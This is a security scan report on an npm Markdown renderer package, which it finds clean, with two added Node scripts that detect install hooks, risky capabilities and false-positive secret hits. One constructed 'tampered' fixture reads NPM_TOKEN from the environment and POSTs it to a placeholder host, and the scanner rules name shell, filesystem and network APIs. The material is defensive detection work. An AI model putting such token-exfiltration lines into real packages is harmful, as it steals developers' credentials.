@ant-design/x-markdown-mini@1.0.1

A high-performance, highly extensible, streaming-friendly Markdown renderer for multiple mini-program scenarios

AI Security Review

scanned 1h ago · by lpm-firewall-ai

No confirmed malicious attack surface was found. The package is a mini-program Markdown renderer with optional KaTeX and code-highlight plugins; suspicious scanner hits map to bundled renderer/parser data and metadata.

Static reason
One or more suspicious static signals were detected; the diff against the previous stored version introduced a dangerous source file.
Trigger
Import or user-invoked markdown rendering/plugin use.
Impact
Renders user-provided markdown; no credential access, exfiltration, persistence, or install-time mutation observed.
Mechanism
Markdown tokenization and mini-program node rendering.
Rationale
Static source inspection found no lifecycle hooks or concrete malicious behavior; the highlighted network/secret/execution signals are package-aligned markdown, font, KaTeX, and highlight.js artifacts. Mark clean because there is no unconsented install-time action, exfiltration, remote payload loading, or destructive behavior.
Evidence
package.json, index.js, index.mjs, katex-font-data.js, plugins/CodeHighlight/index.js, plugins/Latex/index.js

Decision evidence

public snapshot
AI called this Clean at 94.0% confidence as Benign with low false-positive risk.
Evidence for block
  • index.js installs Array.prototype.at / String.prototype.at polyfills at import time, but this touches only local JS built-ins.
  • plugins/CodeHighlight/index.js contains shell command names in bundled Bash syntax highlighter data, not executed code.
  • katex-font-data.js embeds base64 KaTeX TTF font data; secret-looking strings are font bytes/license text.
Evidence against
  • package.json has no preinstall/install/postinstall scripts and no bin entry.
  • index.js/index.mjs export markdown parsing/rendering APIs based on marked and platform renderers.
  • No child_process, fs file writes/reads, process.env harvesting, eval/new Function, or network request APIs found in runtime entrypoints.
  • Network strings are README/package metadata, markdown URL parsing, or http-to-https image normalization, not outbound calls.
  • plugins/Latex and plugins/CodeHighlight are bundled KaTeX/highlight.js style renderers invoked by user configuration.
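The checks in the two lists above can be reproduced mechanically. The following Node script is an added example written for this page, not the scanner's or the package's code: it takes a package as an in-memory map of paths to contents, reports lifecycle hooks and bin entries from package.json, resolves the entrypoints (main, module, exports) and greps them for the capabilities named above, matching API use rather than URL text so that README links and an http-to-https image rewrite stay quiet. Both sample packages in it are constructed for illustration; their names, scripts, file contents and the rule set are assumptions.

```javascript
'use strict';
// Added example, not the scanner's or the package's code: the install-time and
// runtime-entrypoint checks listed under "Evidence against", run over an npm
// package given as an in-memory { path: contents } map. Both sample packages
// below are constructed for illustration; rule and field names are assumptions.

// Scripts npm runs automatically on install; a clean library normally has none.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Capabilities a Markdown renderer has no reason to use. The patterns match
// API use (module import, call), not URL text, so a README link or an
// http-to-https rewrite of image URLs does not trip them.
const RUNTIME_RULES = [
  { cap: 'child_process', re: /(?:require\(\s*|from\s+)['"]child_process['"]/ },
  { cap: 'fs',            re: /(?:require\(\s*|from\s+)['"]fs(?:\/promises)?['"]/ },
  { cap: 'env',           re: /\bprocess\.env\b/ },
  { cap: 'dynamic-code',  re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  { cap: 'network',       re: /(?:require\(\s*|from\s+)['"](?:https?|net|dgram)['"]|\bfetch\s*\(|\bXMLHttpRequest\b|\bwx\.request\s*\(/ },
];

// Files loaded on require()/import of the package: main, module, and the "."
// entry of an exports map (a string or a conditions object). npm's default
// when nothing is declared is index.js.
function entrypoints(pkg) {
  const found = new Set();
  const add = (v) => { if (typeof v === 'string') found.add(v.replace(/^\.\//, '')); };
  add(pkg.main);
  add(pkg.module);
  const exp = pkg.exports;
  if (typeof exp === 'string') {
    add(exp);
  } else if (exp && typeof exp === 'object') {
    const dot = '.' in exp ? exp['.'] : exp;
    if (typeof dot === 'string') add(dot);
    else if (dot && typeof dot === 'object') Object.values(dot).forEach(add);
  }
  if (found.size === 0) found.add('index.js');
  return [...found];
}

function manifestFindings(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ kind: 'lifecycle', hook, cmd: scripts[hook] });
  }
  if (pkg.bin) findings.push({ kind: 'bin', bin: pkg.bin }); // informational: the package adds a CLI
  return findings;
}

function runtimeFindings(files, entries) {
  const out = [];
  for (const file of entries) {
    const src = files[file];
    if (src === undefined) continue; // declared but not shipped; nothing to scan
    for (const { cap, re } of RUNTIME_RULES) {
      const m = re.exec(src);
      if (m) out.push({ file, cap, match: m[0] });
    }
  }
  return out;
}

// "review" when something runs without consent (a lifecycle hook) or an
// entrypoint reaches for a capability outside the package's stated purpose;
// a bin entry alone is reported but does not change the verdict.
function triage(files) {
  const pkg = JSON.parse(files['package.json']);
  const entries = entrypoints(pkg);
  const manifest = manifestFindings(pkg);
  const runtime = runtimeFindings(files, entries);
  const hooks = manifest.some((f) => f.kind === 'lifecycle');
  return { entrypoints: entries, manifest, runtime, verdict: (hooks || runtime.length > 0) ? 'review' : 'clean' };
}

// Constructed sample 1: the shape this report describes (a polyfill patching a
// built-in at import time, URL text, an http-to-https image rewrite).
const RENDERER_PKG = {
  'package.json': JSON.stringify({
    name: 'example-markdown-mini', version: '1.0.1',
    main: 'index.js', module: 'index.mjs',
    exports: { '.': { import: './index.mjs', require: './index.js' } },
    scripts: { build: 'tsc -p .', test: 'node --test' },
  }),
  'index.js': [
    '"use strict";',
    'if (!Array.prototype.at) { Array.prototype.at = function (i) { return this[i < 0 ? this.length + i : i]; }; }',
    'const SPEC = "https://spec.commonmark.org/";',
    'function normalizeImage(u) { return u.replace(/^http:\\/\\//, "https://"); }',
    'module.exports = { render: (md) => md.trim(), normalizeImage, SPEC };',
  ].join('\n'),
  'index.mjs': 'export function render(md) { return md.trim(); }\n',
};

// Constructed sample 2: the same package with a lifecycle hook and an
// entrypoint that shells out, reads the environment and calls out.
const TAMPERED_PKG = {
  'package.json': JSON.stringify({
    name: 'example-markdown-mini', version: '1.0.2', main: 'index.js',
    scripts: { postinstall: 'node setup.js' },
  }),
  'index.js': [
    'const cp = require("child_process");',
    'const token = process.env.NPM_TOKEN;',
    'fetch("https://example.invalid/", { method: "POST", body: token });',
  ].join('\n'),
};

console.log(JSON.stringify({ renderer: triage(RENDERER_PKG), tampered: triage(TAMPERED_PKG) }, null, 2));
```

The rules are lexical, so a `require` assembled from string fragments or a minified bundle that aliases globals will slip past them; treat a "clean" result here as the same kind of evidence the report gives (absence of obvious hooks and capabilities in the entrypoints), and follow any "review" verdict with a look at the file in question rather than trusting the regex match alone.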
Behavioral surface
Source
ChildProcess, Network, Shell
Supply chain
HighEntropyStrings, Minified, UrlStrings
Manifest
No manifest risk signals triggered.
scanned 21 file(s), 3.77 MB of source, external domains: cdn.jsdelivr.net, docs.python.org, en.wikibooks.org, github.com, spec.commonmark.org, tc39.es, tex.stackexchange.com, www.w3.org, yaml.org

Source & flagged code

20 flagged

katex-font-data.js (10 flagged)
  line  patternName     severity  matchedText        finding
  5     aws_access_key  critical  "KaTeX_A...8=",    Critical Secret: package contains a critical-looking secret pattern
  5     aws_access_key  critical  "KaTeX_A...8=",    Secret Pattern: AWS access key ID in katex-font-data.js
  7     aws_access_key  critical  "KaTeX_C...8=",    Secret Pattern: AWS access key ID in katex-font-data.js
  11    aws_access_key  critical  "KaTeX_M...==",    Secret Pattern: AWS access key ID in katex-font-data.js
  14    aws_access_key  critical  "KaTeX_M...8=",    Secret Pattern: AWS access key ID in katex-font-data.js
  16    aws_access_key  critical  "KaTeX_S...AP",    Secret Pattern: AWS access key ID in katex-font-data.js
  17    aws_access_key  critical  "KaTeX_S...8=",    Secret Pattern: AWS access key ID in katex-font-data.js
  20    aws_access_key  critical  "KaTeX_S...AP",    Secret Pattern: AWS access key ID in katex-font-data.js
  23    aws_access_key  critical  "KaTeX_S...8=",    Secret Pattern: AWS access key ID in katex-font-data.js
  24    aws_access_key  critical  "KaTeX_T...w=="    Secret Pattern: AWS access key ID in katex-font-data.js
index.js (1 flagged)
  High  Previous Version Dangerous Delta
    matchType = previous_version_dangerous_delta
    matchedPackage = @ant-design/x-markdown-mini@1.0.0
    matchedIdentity = npm:[redacted]:1.0.0
    similarity = 0.857
    summary = stored previous version shares package body but lacks this dangerous source file
    This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.
miniprogram_dist/katex-font-data.js (9 flagged)
  line  patternName     severity  matchedText        finding
  5     aws_access_key  critical  "KaTeX_A...8=",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  7     aws_access_key  critical  "KaTeX_C...8=",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  11    aws_access_key  critical  "KaTeX_M...==",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  14    aws_access_key  critical  "KaTeX_M...8=",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  16    aws_access_key  critical  "KaTeX_S...AP",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  17    aws_access_key  critical  "KaTeX_S...8=",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  20    aws_access_key  critical  "KaTeX_S...AP",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  23    aws_access_key  critical  "KaTeX_S...8=",    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
  24    aws_access_key  critical  "KaTeX_T...w=="    Secret Pattern: AWS access key ID in miniprogram_dist/katex-font-data.js
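Every aws_access_key hit above lands on a base64 font string, which is the classic shape of a secret-scanner false positive: the base64 alphabet includes [A-Z0-9], so a key-shaped 20-character slice can occur inside a long blob. The following Node script is an added example for this page, not the scanner's code, showing one way to triage such hits: find the base64 run a hit sits in, decode it, deprioritize hits that are slices of a font or other binary, and still escalate a standalone token, a hit inside base64 that decodes to text, and a key that was itself base64-encoded (which the raw regex cannot see at all). The scanned source is constructed, the key regex is an assumed scanner-style pattern rather than the scanner's actual rule, and AKIAIOSFODNN7EXAMPLE is the placeholder key from AWS's own documentation, not a live credential.

```javascript
'use strict';
// Added example, not the scanner's code: why an AWS-access-key pattern fires on
// base64 font data, and a context check that separates such hits from a real
// standalone key or a key hidden inside base64 text. The source scanned below
// is constructed; AKIAIOSFODNN7EXAMPLE is the placeholder key from AWS's own
// documentation, not a live credential. The key regex is an assumption about
// scanner-style patterns, not the scanner's actual rule.

const AWS_KEY_ID = /(?:AKIA|ASIA)[A-Z0-9]{16}/g;
const BASE64_RUN = /[A-Za-z0-9+/]+=*/g;

// A fake TrueType blob whose base64 form contains the example key: 6 header
// bytes (sfnt version 0x00010000, numTables = 11) encode to 8 characters, so
// the 15 bytes decoded from the key re-encode to the same 20 characters.
function constructedFontBase64() {
  const header = Buffer.from([0x00, 0x01, 0x00, 0x00, 0x00, 0x0b]);
  const keyBytes = Buffer.from('AKIAIOSFODNN7EXAMPLE', 'base64');
  const filler = Buffer.from(Array.from({ length: 60 }, (_, i) => i));
  return Buffer.concat([header, keyBytes, filler]).toString('base64');
}

// Classify decoded bytes: a known font container, other binary, or text.
function describeDecoded(buf) {
  if (buf.length >= 4) {
    const tag = buf.subarray(0, 4).toString('latin1');
    if (tag === '\u0000\u0001\u0000\u0000' || tag === 'true') return 'truetype';
    if (tag === 'OTTO') return 'opentype-cff';
    if (tag === 'wOFF' || tag === 'wOF2') return 'woff';
  }
  if (buf.length === 0) return 'text';
  let nonText = 0;
  for (const b of buf) {
    if ((b < 0x20 && b !== 0x09 && b !== 0x0a && b !== 0x0d) || b > 0x7e) nonText++;
  }
  return nonText / buf.length > 0.3 ? 'binary' : 'text';
}

// A raw pattern hit is judged by the base64 run it sits in. A hit that is the
// whole token, sits in a token that is not valid base64, or sits in base64
// that decodes to text is escalated; a slice of a blob that decodes to a font
// or other binary is deprioritized as data rather than a credential.
function triageRawHit(runText, hitText) {
  if (runText.length === hitText.length) return { verdict: 'escalate', reason: 'standalone token' };
  if (runText.length % 4 !== 0) return { verdict: 'escalate', reason: 'inside a token that is not base64' };
  const kind = describeDecoded(Buffer.from(runText, 'base64'));
  if (kind === 'text') return { verdict: 'escalate', reason: 'inside base64 that decodes to text' };
  return { verdict: 'deprioritize', reason: `slice of a ${runText.length}-char base64 run decoding to ${kind}` };
}

function scanSource(source) {
  const results = [];
  source.split('\n').forEach((line, i) => {
    const runs = [...line.matchAll(BASE64_RUN)];
    const inRun = (m) => runs.find((r) => r.index <= m.index && m.index + m[0].length <= r.index + r[0].length);
    for (const m of line.matchAll(AWS_KEY_ID)) {
      const run = inRun(m);
      results.push({ line: i + 1, hit: m[0], ...triageRawHit(run ? run[0] : m[0], m[0]) });
    }
    // The raw regex cannot see a key that was itself base64-encoded, so decode
    // every plausible run and rescan the ones that turn back into text.
    for (const r of runs) {
      if (r[0].length < 24 || r[0].length % 4 !== 0) continue;
      const decoded = Buffer.from(r[0], 'base64');
      if (describeDecoded(decoded) !== 'text') continue;
      for (const m of decoded.toString('latin1').matchAll(AWS_KEY_ID)) {
        results.push({ line: i + 1, hit: m[0], verdict: 'escalate', reason: 'key inside base64-decoded text' });
      }
    }
  });
  return results;
}

// Constructed source: a font-data line shaped like katex-font-data.js, a key
// left in plain source, and the same key hidden by base64-encoding it.
const CONSTRUCTED_SOURCE = [
  '// constructed line in the shape of katex-font-data.js',
  `  KaTeX_AMS: "data:font/ttf;base64,${constructedFontBase64()}",`,
  '// constructed: a key left in source',
  '  const accessKeyId = "AKIAIOSFODNN7EXAMPLE";',
  '// constructed: the same key base64-encoded',
  `  const blob = "${Buffer.from('AKIAIOSFODNN7EXAMPLE').toString('base64')}";`,
].join('\n');

console.log(JSON.stringify(scanSource(CONSTRUCTED_SOURCE), null, 2));
```

The decode check is strongest when the blob carries a recognizable container magic (TrueType, OpenType CFF, WOFF), as the KaTeX TTF data here does; a run that decodes to unstructured "binary" gets the same deprioritize verdict but deserves a spot-check, since a key embedded in a longer mixed-case identifier of base64-valid length would decode to junk bytes just as well.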

Findings

19 Critical · 1 High · 1 Medium · 2 Low

  Critical  Critical Secret                   katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  Critical  Secret Pattern                    miniprogram_dist/katex-font-data.js
  High      Previous Version Dangerous Delta  index.js
  Medium    Network
  Low       High Entropy Strings
  Low       Url Strings